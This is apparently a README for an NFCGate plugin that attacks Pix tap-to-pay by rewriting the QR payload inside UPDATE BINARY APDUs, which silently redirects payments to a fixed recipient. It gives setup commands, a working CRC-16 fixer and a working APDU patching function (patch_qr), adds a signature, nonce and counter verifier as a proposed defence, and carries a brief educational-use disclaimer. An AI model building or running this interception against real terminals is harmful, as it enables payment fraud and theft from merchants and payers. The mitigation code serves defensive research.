
Technical article showing how a MITM attack against Pix tap-to-pay can swap the dynamic QR during APDU exchanges (UPDATE BINARY), silently redirecting payments without breaking any cryptography. We detail the flow, a PoC with NFCGate, CRC recalculation, and defenses: per-transaction signature, nonce, timestamp, counter, and strict AID/offset checks.

penegui/MITM-PixNFC

NFCGate – mod_pixpatch Plugin

Goal: intercept Tap to Pix APDUs and replace the payload after qr= with a fixed Pix QR Code (CRC already included), enabling lab security testing.


Prerequisites

| Item | Minimum version | Notes |
|---|---|---|
| Python | 3.8+ | NFCGate server |
| pip | Up-to-date | For optional dependencies |
| Android | 8.0+ with root | NFCGate client |
| NFCGate | master branch | client (APK) + server |
| Proxmark3 (optional) | RDV4 | Sniff analysis |

⚠️ Strictly for educational use. Do not run in production environments without formal authorization.


1 · Cloning NFCGate

# Server
git clone https://github.com/nfcgate/nfcgate.git
cd nfcgate/server

# (Optional) create venv
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

2 · Adding the plugin

# Still inside nfcgate/server
mkdir -p plugins
cp /path/to/mod_pixpatch.py plugins/

The plugin must be saved exactly as plugins/mod_pixpatch.py.


3 · Configuring variables (optional)

You can tweak the fixed QR Code by editing the constants at the top of the file:

PREFIXO_QR = b"pix://BR.COM.PAGSEGURO?qr="
NOVO_PAYLOAD_PIX = (
    "000201...6304XXXX"
)

Tip: use python3 crc16.py <payload_without_crc> to recalculate field 6304 whenever you change the QR Code.
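As an added, stand-alone illustration of the CRC step (this is not the repository's `crc16.py`), the following implements the checksum the `6304` field carries: CRC-16/CCITT-FALSE (polynomial 0x1021, initial value 0xFFFF, no reflection, no final XOR), computed over the whole payload including the literal `6304` tag and length, and appended as four uppercase hex digits. `SAMPLE_WITHOUT_CRC` is a constructed static BR Code skeleton with a placeholder Pix key, not a real merchant payload.

```python
import sys

CRC_POLY = 0x1021
CRC_INIT = 0xFFFF


def crc16_ccitt_false(data: bytes) -> int:
    """CRC-16/CCITT-FALSE: poly 0x1021, init 0xFFFF, no reflection, no final XOR."""
    crc = CRC_INIT
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ CRC_POLY) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


def append_crc(payload_without_crc: str) -> str:
    """Append field 63 (ID "63", length "04") carrying the CRC of everything before it.

    The CRC covers the payload *including* the "6304" prefix, so the prefix is
    added first if the caller left it out.
    """
    if not payload_without_crc.endswith("6304"):
        payload_without_crc += "6304"
    crc = crc16_ccitt_false(payload_without_crc.encode("ascii"))
    return f"{payload_without_crc}{crc:04X}"


def verify_crc(payload: str) -> bool:
    """True when the last four hex digits match the CRC over the preceding text."""
    if len(payload) < 8 or payload[-8:-4] != "6304":
        return False
    try:
        stated = int(payload[-4:], 16)
    except ValueError:
        return False
    return stated == crc16_ccitt_false(payload[:-4].encode("ascii"))


# Constructed sample: a minimal static Pix BR Code without its CRC field.
# The Pix key "example-key" is a placeholder, not a real key.
SAMPLE_WITHOUT_CRC = (
    "000201"                                  # payload format indicator
    "010211"                                  # point of initiation: static
    "26330014BR.GOV.BCB.PIX0111example-key"   # merchant account information
    "52040000"                                # merchant category code
    "5303986"                                 # transaction currency (BRL)
    "5802BR"                                  # country code
    "5905TESTE"                               # merchant name
    "6006CIDADE"                              # merchant city
)


if __name__ == "__main__":
    # Same calling convention as the README's tip: <script> <payload_without_crc>
    src = sys.argv[1] if len(sys.argv) > 1 else SAMPLE_WITHOUT_CRC
    full = append_crc(src)
    print(full)
    print("crc ok" if verify_crc(full) else "crc BAD")
```

Run `verify_crc()` on the patched payload before loading it into `NOVO_PAYLOAD_PIX`: the troubleshooting symptom "App shows no transaction" is exactly what a wrong `6304XXXX` produces, and a single flipped character anywhere before the CRC is enough to trigger it.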


4 · Running the server with the plugin

python3 server.py --plugins pixpatch --host 0.0.0.0 --port 5566

Debug logs will appear in the terminal with the [DEBUG] prefix.


5 · Android client setup

  1. Install the NFCGate APK (local build or release).
  2. Grant root via Magisk/SuperSU.
  3. In settings, set Server URI to ws://<SERVER_IP>:5566.
  4. Enable the Man-in-the-Middle module and start capturing.

6 · Test flow

  1. Bring the payment terminal/POS close to the phone.
  2. Watch the log for the UPDATE BINARY commands D6 00 00 and D6 00 FA (INS D6; P1 P2 give the write offset, 0x0000 and 0x00FA).
  3. Verify that the value after qr= was replaced with the fixed payload (field 6304 intact).
  4. Confirm in the Payer app that the recipient/amount matches the forged payload.
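To make the test flow concrete, here is an added, self-contained model of what a `qr=` patching hook must do to one ISO 7816 UPDATE BINARY command APDU. It is not `mod_pixpatch.py` itself: the `CommandApdu` class, `build_update_binary()` and `patch_qr()` are this example's own names, `NOVO_PAYLOAD_PIX` below is a constructed placeholder whose `6304` field does not carry a real CRC, and the model handles a single APDU only, so the split of the original QR across the two writes at offsets 0x0000 and 0x00FA seen in the log is not reassembled here.

```python
from dataclasses import dataclass

INS_UPDATE_BINARY = 0xD6
MAX_SHORT_LC = 255                            # a short APDU has a one-byte Lc
PREFIXO_QR = b"pix://BR.COM.PAGSEGURO?qr="    # prefix constant from the README
# Constructed placeholder; a usable replacement needs a valid 6304 CRC.
NOVO_PAYLOAD_PIX = "0002015802BR5905TESTE6006CIDADE63040000"


@dataclass(frozen=True)
class CommandApdu:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes

    @classmethod
    def parse(cls, raw: bytes) -> "CommandApdu":
        """Parse a short case-3 APDU: CLA INS P1 P2 Lc Data[Lc] (no Le)."""
        if len(raw) < 5:
            raise ValueError("APDU too short")
        lc = raw[4]
        if len(raw) != 5 + lc:
            raise ValueError(f"Lc mismatch: Lc={lc} but {len(raw) - 5} data bytes present")
        return cls(raw[0], raw[1], raw[2], raw[3], bytes(raw[5:]))

    def serialize(self) -> bytes:
        """Re-encode with Lc recomputed from the (possibly patched) data."""
        if len(self.data) > MAX_SHORT_LC:
            raise ValueError(
                f"patched data is {len(self.data)} bytes > {MAX_SHORT_LC}: needs an extended APDU")
        return bytes([self.cla, self.ins, self.p1, self.p2, len(self.data)]) + self.data

    @property
    def offset(self) -> int:
        """UPDATE BINARY with P1 bit 8 clear: P1||P2 is a 15-bit offset into the EF."""
        return ((self.p1 & 0x7F) << 8) | self.p2


def build_update_binary(offset: int, data: bytes, cla: int = 0x00) -> bytes:
    """Build the APDU a terminal would send to write `data` at `offset`."""
    return CommandApdu(cla, INS_UPDATE_BINARY, (offset >> 8) & 0x7F, offset & 0xFF, data).serialize()


def patch_qr(raw: bytes, prefix: bytes = PREFIXO_QR, new_payload: str = NOVO_PAYLOAD_PIX) -> bytes:
    """Replace everything after `prefix` in an UPDATE BINARY APDU; pass anything else through."""
    apdu = CommandApdu.parse(raw)
    if apdu.ins != INS_UPDATE_BINARY:
        return raw                              # SELECT, READ BINARY, etc. are untouched
    idx = apdu.data.find(prefix)
    if idx < 0:
        return raw                              # this chunk does not carry "qr="
    new_data = apdu.data[: idx + len(prefix)] + new_payload.encode("ascii")
    return CommandApdu(apdu.cla, apdu.ins, apdu.p1, apdu.p2, new_data).serialize()


if __name__ == "__main__":
    original = build_update_binary(0, PREFIXO_QR + b"0002015802BR63041234")  # constructed
    patched = patch_qr(original)
    print("before:", original.hex())
    print("after: ", patched.hex())
    print("offset:", CommandApdu.parse(patched).offset, "Lc:", patched[4])
```

The two failure modes listed under Troubleshooting both surface here: `serialize()` refuses data longer than 255 bytes instead of emitting a wrapped Lc, and `parse()` rejects a frame whose Lc disagrees with the bytes actually present.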

7 · Possible vulnerability mitigation

| Need | Where to change |
|---|---|
| Implement signature `sig=<signature>` | TODO: generate a signature for each transaction attempt; not implemented |
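The row above is a TODO in the repository, so the following is an added sketch (not project code) of what binding the QR to a per-transaction authenticator looks like on the payer side, using the `sig=` query field the table names together with the timestamp, nonce and counter the article lists as defenses. It uses HMAC-SHA256 with a key shared between the issuer and the verifying app as a stand-in for the asymmetric signature the README proposes, so that it runs on the standard library alone; `DEMO_KEY`, `MAX_AGE_S`, the field names `ts`, `nonce`, `ctr` and the sample payload are all constructed for the demo.

```python
import hashlib
import hmac
import os
import time
from typing import Dict, Optional, Set, Tuple

PREFIX = "pix://BR.COM.PAGSEGURO?"                                   # prefix from the README
DEMO_KEY = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)   # constructed demo key only
MAX_AGE_S = 60                                                       # assumed freshness window


def _mac_input(payload: str, ts: int, nonce_hex: str, ctr: int) -> bytes:
    # Length-prefixed fields so no value can be shifted into a neighbouring field.
    parts = [payload, str(ts), nonce_hex, str(ctr)]
    return b"".join(len(p).to_bytes(2, "big") + p.encode("utf-8") for p in parts)


def make_signed_uri(payload: str, counter: int, key: bytes = DEMO_KEY,
                    now: Optional[int] = None, nonce: Optional[bytes] = None) -> str:
    """Issuer side: tie the QR payload to time, a fresh nonce and a monotonic counter."""
    ts = int(time.time()) if now is None else now
    nonce_hex = (os.urandom(8) if nonce is None else nonce).hex()
    tag = hmac.new(key, _mac_input(payload, ts, nonce_hex, counter), hashlib.sha256).hexdigest()
    return f"{PREFIX}qr={payload}&ts={ts}&nonce={nonce_hex}&ctr={counter}&sig={tag}"


class QrVerifier:
    """Payer side: check the authenticator first, then freshness and replay state."""

    def __init__(self, key: bytes = DEMO_KEY, max_age_s: int = MAX_AGE_S) -> None:
        self.key = key
        self.max_age_s = max_age_s
        self.seen_nonces: Set[str] = set()
        self.last_counter = -1

    def verify(self, uri: str, now: Optional[int] = None) -> Tuple[bool, str]:
        now = int(time.time()) if now is None else now
        if not uri.startswith(PREFIX):
            return False, "unexpected prefix"
        fields: Dict[str, str] = dict(
            kv.split("=", 1) for kv in uri[len(PREFIX):].split("&") if "=" in kv)
        try:
            payload, sig, nonce_hex = fields["qr"], fields["sig"], fields["nonce"]
            ts, ctr = int(fields["ts"]), int(fields["ctr"])
        except (KeyError, ValueError):
            return False, "missing or malformed field"
        expected = hmac.new(self.key, _mac_input(payload, ts, nonce_hex, ctr),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, sig):
            return False, "bad signature"         # any byte swapped after qr= lands here
        if abs(now - ts) > self.max_age_s:
            return False, "stale timestamp"
        if nonce_hex in self.seen_nonces:
            return False, "nonce already used"    # replay of a captured URI
        if ctr <= self.last_counter:
            return False, "counter not increasing"
        self.seen_nonces.add(nonce_hex)
        self.last_counter = ctr
        return True, "ok"


if __name__ == "__main__":
    payload = "0002015802BR5905TESTE6006CIDADE63041234"   # constructed
    uri = make_signed_uri(payload, counter=1)
    swapped = uri.replace(payload, "0002015802BR5907ATTACKER6006CIDADE63040000", 1)
    v = QrVerifier()
    print("genuine:", v.verify(uri))
    print("swapped:", v.verify(swapped))
    print("replay: ", v.verify(uri))
```

With this in place the PoC's rewrite of the bytes after `qr=` still goes through the NFC link unopposed, but the payer app rejects the result before showing a recipient; the MITM would have to forge `sig=` for the attacker's payload, which is the property the README is after.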

8 · Troubleshooting

| Symptom | Possible cause | Solution |
|---|---|---|
| patched2 > 255 | Patched data no longer fits the one-byte Lc of a short APDU | Reduce the payload size or use an extended APDU |
| Lc mismatch | Lc does not match the number of data bytes actually sent | Check the len1 and new_lc calculations |
| App shows no transaction | Incorrect CRC in field 63 | Recalculate 6304XXXX over the new payload |

9 · License & Ethics

This code is intended exclusively for security research. The author is not responsible for misuse.
